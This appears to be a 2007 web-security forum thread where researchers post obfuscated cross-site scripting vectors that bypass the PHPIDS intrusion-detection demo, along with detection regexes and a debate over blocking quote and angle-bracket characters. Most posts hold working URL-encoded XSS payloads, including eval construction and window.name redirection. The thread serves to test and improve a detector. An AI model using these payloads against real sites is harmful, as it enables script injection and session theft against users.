Wow!

That was unexpected and I am speechless!

Web Application Security Journ(ey)al

Totally evil - awesome vector SDC!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

It's a pity XML predicates don't work in IE :(

This one is cross-browser, though:
http://demo.php-ids.org/?test=%24_%3Ddocument%2C%24__%3D%24_.URL%2C%24___%3Dunescape%2C%24_%3D%24_.body%2C%24_.innerHTML%20%3D%20%24___(http%3D%24__)#%3Ciframe%20src%3D%22javascript%3Atop.document.body.firstChild.nodeValue%3D''%2Calert('PWND%20%3A)')%22%3E%3C%2Fiframe%3E%3Cdiv%20style%3D'text-align%3A%20center%3B%20background%3A%20yellow'%3E%3Ch2%3EPWND%20by%20ma1%3C%2Fh2%3E%3Ca%20href%3D'http%3A%2F%2Fnoscript.net'%3EThere's%20a%20browser%20safer%20than%20Firefox...%20it's%20Firefox%2C%20with%20NoScript%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fbody%3E%3C%2Fhtml%3E

Have a nice Sunday :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@.mario:
wow, that's been fast.
Starting to pant, like SDC :)

This one is still cross-browser, with some "bouncing":

http://hackademix.net/name.xss/http://demo.php-ids.org/?test=setTimeout//%0D%0A%28name//%0D%0A,0%29///payloadId=1

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

ma1 Wrote:
-------------------------------------------------------
> .mario Wrote:
> --------------------------------------------------
> -----
> > @Ronald: I agree when talking about GET
> Requests.
>
> So these are all illegal, right?
>
> http://en.wikipedia.org/wiki/Heroes_(TV_series%29
>
> http://kb.mozillazine.org/Label%3D%22%26blockImage
> Cmd._label%3B%22
>
> http://developer.mozilla.org/en/docs/Core_JavaScri
> pt_1.5_Reference:Global_Functions:eval
>
> And I didn't even add any query string :)
>
> As for the tilde character, ~, maybe you're too
> young to remember the time when most of the web
> URLs contained one (especially in .edu sites),
> because it's an Unix shortcut for user's home.
>
> Finally, ?param=& is quite common and legal, since
> it's sent every time an optional field is left
> empty in a form.


Yeah that's why Wikipedia sucks as an example because they work in a very different way by using a meta language, so that doesn't really counts. I mean in "normal" queries I never seen those chars, some do sure. But the only ones I use are pipes or spaces, which are pretty standard in developing. The rest I detect upon. While this said the quote set: ' " and less/greater signs > < without them (and illegal btw) it's is nearly impossible to construct a good injection, the rest is refinement upon them.

So when you detect them, you are half the way.

Oh yeah I'm way too old to remember the tilde ~
my first homepage had one, I'm close to 30 now, so I know this was a special reference character back then.

Just like: < > ' " chars are, ever saw one in a normal query?

Yeah, I know why I love standards, standards in developing just because of this mayhem alone.

@.mario

clearly it's impossible to detect everything with RegExes alone, that is exactly why I block single chars like: ' " < > on the request uri in my .htaccess, cause they never happen, I have a few more but those are only for my site.

So like you proposed, I guess it would be a very good idea to have a triage upon such datasets. The previous examples are nice and all, but pretty useless to launch an sensible attack, Only a few characters that should be detect upon every instance.

Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now.

@all,@ma1: Nice ones aaand fixed ;) As already posted in the group the timed out one is pretty neat!

@Ronald: Yep - I guess we'll have to discuss that with christ1an and lars too but it thinks it's no bad idea. Let's chitchat later about the PHPIDS for PHP4 if you like. We are planning to release 0.3 an thursday and would be a nice feature to have this version aboard.

Greetings,
.mario

Vector of the day:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a=/ev///%0a.source%0aa%2b=/al///%0a.source%0aa%5ba%5d%20%28name%29***content

Slight variation:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a%3D/ev/%20%0A.source%0Aa%2B%3D/al/%20%0A.source%2Ca%20%3D%20a%5Ba%5D%0Aa%28name%29***content

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 07/09/2007 07:35AM by ma1.

Ronald wrote:

"Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now."

I agree with this, on some mine project I only block mentioned chars (' " < >), all anothers are allowed and properly handled with application logic.

http://www.security-net.biz/

@ma1: fixed and fixed

@.mario:
Since you're not satisfied yet with PHPIDS' newline attacks detection, one-liner here for fairness sake :)

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=b%3Dtop%2Ca%3D/loc/%20.%20source%2Ca%2B%3D/ation/%20.%20source%2Cb%5Ba%3Da%5D%20%3D%20name***content,

BTW, if anyone is interested I've just generalized name.xss for general consumption. Here's a "man page"

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

a=alert
a(0)

This harmless vector is still alive

Web Application Security Journ(ey)al

That little.. ******* ;) Thx kishord - almost forgot it!

@.mario:
Excuse my ignorance, but what's exactly the magic of "y" in

(?:[^y](?:hash|host|hostname|href|source|pathname|port|protocol|searcages|links|cookie|innerhtml|innertext|outerhtml)\s*(?:[^\w\s]|\n))]

and

(?:[^y](?:charat|charcodeat|concat|fromcharcode|indexof|lastindexof|match|replace|search|slice|split|substr|substring|escape)\s*(?:[^\w\s]|\n))

Probably related, why

&yport=80

is innocuous while

&xport=80

is almost as evil as the terrible

&port=80

? :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 2 time(s). Last edit at 07/09/2007 03:21PM by ma1.

kishord Wrote:
-------------------------------------------------------
> a=alert
> a(0)
>
> This harmless vector is still alive

Speaking of super-simple stuff, this not so harmless one is too:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=location=name***content,post

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/09/2007 03:01PM by ma1.

Hi!

The mysterious y is a relic from when we had lots of false positives by the yahoo page slurp spider - and since no critical JS function matches the pattern y\w+ we just fixed the issue that way.

The location=name vector is evil - i hate the self contained stuff via name because it's almost undetectable. I mean okay - you can detect location[^\w\s]\n*name but that would just catch the un-obfuscated ones.

Have to think about that...

Greetings,
.mario